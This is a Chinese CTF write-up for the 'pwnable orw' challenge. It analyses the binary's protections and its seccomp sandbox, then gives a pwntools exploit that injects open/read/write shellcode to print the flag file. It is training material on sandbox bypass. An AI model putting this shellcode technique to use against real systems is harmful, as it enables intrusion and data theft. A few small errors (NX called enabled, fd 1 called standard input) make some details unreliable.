pwnable orw

# pwnable orw

# 前提

# 查看文件保护

[*] '/root/pwn/buuctf/pwnable_orw/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

1
2
3
4
5
6
7

# 静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

1
2
3
4
5
6
7
8

orw_seccomp函数及函数表如下

unsigned int orw_seccomp()
{
  __int16 v1; // [esp+4h] [ebp-84h] BYREF
  char *v2; // [esp+8h] [ebp-80h]
  char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
  unsigned int v4; // [esp+6Ch] [ebp-1Ch]

  v4 = __readgsdword(0x14u);
  qmemcpy(v3, &unk_8048640, sizeof(v3));
  v1 = 12;
  v2 = v3;
  prctl(38, 1, 0, 0, 0);
  prctl(22, 2, &v1);
  return __readgsdword(0x14u) ^ v4;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

沙箱规则如下

seccomp-tools dump ./orw 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0x40000003  if (A != ARCH_I386) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x07 0x00 0x000000ad  if (A == rt_sigreturn) goto 0011
 0004: 0x15 0x06 0x00 0x00000077  if (A == sigreturn) goto 0011
 0005: 0x15 0x05 0x00 0x000000fc  if (A == exit_group) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == exit) goto 0011
 0007: 0x15 0x03 0x00 0x00000005  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == read) goto 0011
 0009: 0x15 0x01 0x00 0x00000004  if (A == write) goto 0011
 0010: 0x06 0x00 0x00 0x00050026  return ERRNO(38)
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# 思路分析

目前信息：
- 沙箱规则只允许sigreturn、exit、open、read、write这几个系统调用
- shellcode在bss段且非常长
- read读入输入的数据将其写入shellcode处，然后直接跳转到该处
- Canary found
- NX enabled
- Has RWX segments
思路：
- 构造shellcode，使用open打开flag文件，read读取其中内容，write再打印出来

# exp

from pwn import *
from LibcSearcher import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/pwnable_orw/orw'
# io = remote('node4.buuoj.cn', 25746)
io = process(pwnfile)
elf = ELF(pwnfile)
shellcode = asm(shellcraft.open('./flag'))
# 打开flag文件
shellcode += asm(shellcraft.read('eax', 'esp', 42))
# eax为sys_open函数结束时返回的fd文件描述符
shellcode += asm(shellcraft.write(1, 'esp', 42))
# 1为标准输入
shellcode += asm(shellcraft.exit(0))
io.sendafter('Give my your shellcode:', shellcode)
print(io.recv())

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

#buuctf #pwn #StackOverflow #sandbox

上次更新: 2022/08/15, 00:29:49

← ZJCTF 2019 EasyHeap wustctf2020 getshell→